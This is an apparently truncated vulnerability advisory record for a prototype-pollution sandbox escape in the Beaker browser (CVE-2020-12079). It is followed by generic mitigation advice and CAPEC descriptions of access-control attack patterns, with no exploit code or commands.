"details": "Beaker before 0.8.9 allows a sandbox escape, enabling system access and code execution. This occurs because Electron context isolation is not used, and therefore an attacker can conduct a prototype-pollution attack against the Electron internal messaging API.",
"id": "GHSA-qxvv-6mm7-75fh",
"modified": "2022-12-02T21:30:42Z",
"published": "2022-05-24T17:16:17Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-12079"
},
{
"type": "WEB",
"url": "https://github.com/beakerbrowser/beaker/issues/1519"
},
{
"type": "WEB",
"url": "https://github.com/beakerbrowser/beaker/releases/tag/0.8.9"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
By freezing the object prototype first (for example, Object.freeze(Object.prototype)), modification of the prototype becomes impossible.
Mitigation
By blocking modifications of attributes that resolve to object prototype, such as proto or prototype, this weakness can be mitigated.
Mitigation
Strategy: Input Validation
When handling untrusted objects, validating using a schema can be used.
Mitigation
By using an object without prototypes (via Object.create(null) ), adding object prototype attributes by accessing the prototype via the special attributes becomes impossible, mitigating this weakness.
Mitigation
Map can be used instead of objects in most cases. If Map methods are used instead of object attributes, it is not possible to access the object prototype or modify it.
CAPEC-1: Accessing Functionality Not Properly Constrained by ACLs
In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.
CAPEC-180: Exploiting Incorrectly Configured Access Control Security Levels
An attacker exploits a weakness in the configuration of access controls and is able to bypass the intended protection that these measures guard against and thereby obtain unauthorized access to the system or network. Sensitive functionality should always be protected with access controls. However configuring all but the most trivial access control systems can be very complicated and there are many opportunities for mistakes. If an attacker can learn of incorrectly configured access security settings, they may be able to exploit this in an attack.
CAPEC-77: Manipulating User-Controlled Variables
This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.